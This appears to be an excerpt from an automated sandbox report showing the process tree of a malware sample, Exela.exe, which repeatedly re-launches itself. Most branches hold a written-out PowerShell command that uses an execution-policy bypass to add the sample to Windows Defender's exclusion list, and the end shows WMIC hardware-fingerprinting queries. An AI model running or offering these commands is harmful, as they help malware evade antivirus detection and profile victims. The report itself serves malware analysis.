        PID:2656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2460
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        37⤵
        
        PID:5048
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        38⤵
        
        PID:2360
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        39⤵
        
        PID:1784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        36⤵
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        36⤵
        
        PID:4448
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        37⤵
        
        PID:2364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        38⤵
        
        PID:4148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        35⤵
        
        PID:4848
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        35⤵
        
        PID:2832
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        36⤵
        
        PID:908
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        37⤵
        
        PID:2516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        34⤵
        
        PID:1468
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        34⤵
        
        PID:1900
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        35⤵
        
        PID:5032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        36⤵
        
        PID:2596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        33⤵
        
        PID:2112
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        33⤵
        Executes dropped EXE
        
        PID:4996
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        34⤵
        Executes dropped EXE
        
        PID:3676
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        35⤵
        
        PID:2288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        32⤵
        
        PID:4040
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        32⤵
        Executes dropped EXE
        
        PID:3748
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        33⤵
        Executes dropped EXE
        
        PID:4528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        34⤵
        
        PID:3444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        31⤵
        
        PID:4220
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        31⤵
        Executes dropped EXE
        
        PID:4764
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        32⤵
        Executes dropped EXE
        
        PID:3292
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        33⤵
        
        PID:452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        30⤵
        
        PID:3244
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        30⤵
        Executes dropped EXE
        
        PID:4616
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        31⤵
        Executes dropped EXE
        
        PID:4732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        32⤵
        
        PID:2556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        29⤵
        
        PID:3600
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        29⤵
        Executes dropped EXE
        
        PID:1320
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        30⤵
        Executes dropped EXE
        
        PID:4644
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        31⤵
        
        PID:4208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        28⤵
        
        PID:1140
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        28⤵
        Executes dropped EXE
        
        PID:1200
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        29⤵
        Executes dropped EXE
        
        PID:5016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        30⤵
        
        PID:1368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        27⤵
        
        PID:3596
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        27⤵
        Executes dropped EXE
        
        PID:3460
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        28⤵
        Executes dropped EXE
        
        PID:4060
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        29⤵
        
        PID:3036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2416
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        26⤵
        Executes dropped EXE
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        27⤵
        Executes dropped EXE
        
        PID:1304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        28⤵
        
        PID:1020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        25⤵
        
        PID:824
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        25⤵
        Executes dropped EXE
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        26⤵
        Executes dropped EXE
        
        PID:2168
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        27⤵
        
        PID:216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        24⤵
        
        PID:4840
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        24⤵
        Executes dropped EXE
        
        PID:3444
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        25⤵
        Executes dropped EXE
        
        PID:520
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        26⤵
        
        PID:4048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        23⤵
        
        PID:3176
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        23⤵
        Executes dropped EXE
        
        PID:3696
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        24⤵
        Executes dropped EXE
        
        PID:2408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        25⤵
        
        PID:4028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        22⤵
        
        PID:4444
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        22⤵
        Executes dropped EXE
        
        PID:2720
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        23⤵
        Executes dropped EXE
        
        PID:3928
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        24⤵
        
        PID:3444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        21⤵
        
        PID:4616
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        21⤵
        Executes dropped EXE
        
        PID:4200
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        22⤵
        Executes dropped EXE
        
        PID:604
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        23⤵
        
        PID:3180
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        20⤵
        
        PID:3460
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        20⤵
        Executes dropped EXE
        
        PID:3244
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        21⤵
        Executes dropped EXE
        
        PID:4928
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        22⤵
        
        PID:2340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        19⤵
        
        PID:2740
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        19⤵
        Executes dropped EXE
        
        PID:2028
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        20⤵
        Executes dropped EXE
        
        PID:4388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        21⤵
        
        PID:4496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        18⤵
        
        PID:2596
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        18⤵
        Executes dropped EXE
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        19⤵
        Executes dropped EXE
        
        PID:1988
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        20⤵
        
        PID:632
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        17⤵
        
        PID:2432
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        17⤵
        Executes dropped EXE
        
        PID:1680
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        18⤵
        Executes dropped EXE
        
        PID:4980
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        19⤵
        
        PID:3444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        16⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4596
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        16⤵
        Executes dropped EXE
        
        PID:3056
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        17⤵
        Executes dropped EXE
        
        PID:1196
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        18⤵
        
        PID:3704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        15⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4848
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        15⤵
        Executes dropped EXE
        
        PID:3928
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        16⤵
        Executes dropped EXE
        
        PID:4052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        17⤵
        
        PID:4420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        14⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3444
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        14⤵
        Executes dropped EXE
        
        PID:3176
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        15⤵
        Executes dropped EXE
        
        PID:4012
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        16⤵
        
        PID:4780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        13⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4244
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        13⤵
        Executes dropped EXE
        
        PID:4152
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        14⤵
        Executes dropped EXE
        
        PID:3192
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        15⤵
        
        PID:4728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        12⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3224
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        12⤵
        Executes dropped EXE
        
        PID:228
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        13⤵
        Executes dropped EXE
        
        PID:464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:1884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5104
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        11⤵
        Executes dropped EXE
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        12⤵
        Executes dropped EXE
        
        PID:4752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        13⤵
        
        PID:2180
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4448
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:4952
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        10⤵
        Executes dropped EXE
        
        PID:3828
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        11⤵
        Executes dropped EXE
        
        PID:1924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:5048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3396
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        9⤵
        Executes dropped EXE
        
        PID:3696
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        10⤵
        Executes dropped EXE
        
        PID:1052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        11⤵
        
        PID:3196
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:4316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3088
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:440
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        8⤵
        Executes dropped EXE
        
        PID:1744
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        9⤵
        Executes dropped EXE
        
        PID:2960
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:4952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3792
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4044
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        7⤵
        Executes dropped EXE
        
        PID:3192
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        8⤵
        Executes dropped EXE
        
        PID:4304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        9⤵
        
        PID:4064
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4616
      - C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        6⤵
        Executes dropped EXE
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        7⤵
        Executes dropped EXE
        
        PID:2300
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        8⤵
        
        PID:3748
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:1896
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2112
    - - C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        5⤵
        Executes dropped EXE
        
        PID:4044
      - C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        6⤵
        Executes dropped EXE
        
        PID:2096
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        7⤵
        
        PID:2236
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4656
  - - C:\Users\Admin\AppData\Local\Temp\Exela.exe
      "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3196
    - - C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2928
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:1988
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4928
- - C:\Users\Admin\AppData\Local\Temp\Exela.exe
    "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4644
  - - C:\Users\Admin\AppData\Local\Temp\Exela.exe
      "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1028
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:1896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3388
- C:\Users\Admin\AppData\Local\Temp\Exela.exe
  "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2044
- - C:\Users\Admin\AppData\Local\Temp\Exela.exe
    "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:4312
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3148
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:4064
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3516
